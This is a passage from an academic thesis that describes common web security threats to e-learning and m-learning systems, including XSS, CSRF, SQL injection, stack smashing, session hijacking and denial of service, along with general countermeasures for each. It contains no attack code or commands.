Security issues common to e-learning and m-learning systems

 Cross Site Scripting (XSS) is one of the most common application-layer

security issues attacking the web-pages. XSS is a threat emanating from internet security weaknesses of scripting languages, with HTML and JavaScript as the prime culprits for this exploitation. XSS normally targets scripts embedded in a page which are executed on the client server-side. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed. An XSS attack can be used to achieve the following malicious results: access sensitive information, identity theft and alter browser functionality. However, XSS threats can be reduced by safely validating untrusted HTML input, setting up cookie security on browser, using content security policy, implementing JavaScript sandbox tools and using various auto escaping methods (Hydara et al. 2015).

 Cross Site Request Forgery (CSRF) is an attack that tricks the user into

loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired manipulation function on their behalf, like change the student’s record such as e-mail address, home address, password or even grade. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data (Luminita and Magdalena, 2012). For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic authentication credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request. CSRF prevention techniques

33

work by embedding additional authentication data into requests that allow the web application to detect requests from unauthorised locations.

 SQL Code Injection in the site address performs different searches using

search engines to retrieve personalised web-site information like password and username cracking using decryption tools. Using this method, a hacker can pass string input to an application with the hope of gaining unauthorized access to a database. Hackers enter SQL queries or characters into the web application to execute an unexpected action that can act in a malicious way. Such queries may access unauthorised data, bypass authentication or shutdown a database even if the database resides on the web server or on a separate server. SQL injection can be applied also to URLs, which can be modified by an attacker in order to access important information. SQL injection can be avoided with strict adherence to some basic security practices. Some of the methods to prevent this kind of SQL injection vulnerability are: checking the user's input for dangerous characters like single-quotes; using prepared statements, which tell the database exactly what to expect before any user-provided data is passed to it; encrypt sensitive data; ensuring that error messages give nothing away about the internal architecture of the application or the database.

 Stack-smashing attacks is a type of buffer overflow attack that targets a

specific programming fault such as inappropriate use of data buffers allocated on the program's run-time stack, local variables and function arguments. A stack-smashing attack is a serious problem, since an innocuous service (such as a web server or FTP server) can be made to execute arbitrary commands. The idea is pretty straight forward: insert some attack codes (for example, code that invokes a shell) somewhere and overwrite the stack in such a way that control gets passed to the attack code (Peltier, 2013). It can be avoided by using a language or compiler that performs automatic bounds checking and using technologies that attempt to protect programs against these attacks.

34

 Session Hijacking is the exploitation of a valid computer session, sometimes

called a session key, to gain unauthorised access to information or services. Session Hijack achieved by giving a unique session id to the browser, either in a form of cookie or URL, which the browser submits with every new request. The session is active as long as the browser keeps sending the session id with every new request. The attack is possible when the session id is weakly encrypted, too short or assigned sequentially. Sessions that do not expire on the HTTP server can allow an attacker unlimited time to guess or brute-force a valid authenticated session id and eventually gain access to that user's web accounts. Additionally, a session id can be potentially logged and cached in proxy servers. When transmitted via a URL parameter, requests can potentially be stored in the browser history, cache and bookmarks. It can also be easily viewable afterwards. One method to prevent session hijacking is to set a secure session link via HTTPS (Peltier, 2013).

 Denial-of-Service attacks (DoS) attacks render a service or device unusable

for its legitimate use by denying availability. A successful attack will shut down or dramatically limit the operation time of the target, thereby depriving the users of the services of a resource what they would normally expect to have. It is aimed at complete disruption of routing information which consequently affects the whole operation of the wireless network and normally affects the availability of a computer system. Such attacks could exploit different functionalities, like CPU intensive tasks that require a lot of energy. DoS attacks can be avoided using prevention techniques for counteracting DoS such as protocol traceback techniques on the servers (Tupakula and Varadharajan, 2013) and reverse proxies spread across multiple hosting locations.

It should be noted that these security issues are general ones that are not specific to e- learning and m-learning applications and database systems. They are normally found in any three level system. Just as learning systems are production systems to

35

educational institutions, security becomes a fundamental requirement. As ubiquitous learning platforms increase in demand and popularity, the need to improve their security also increases and inevitable (Zafar et al., 2014)

2.3.2 Security issues in e-learning and m-learning (Client level)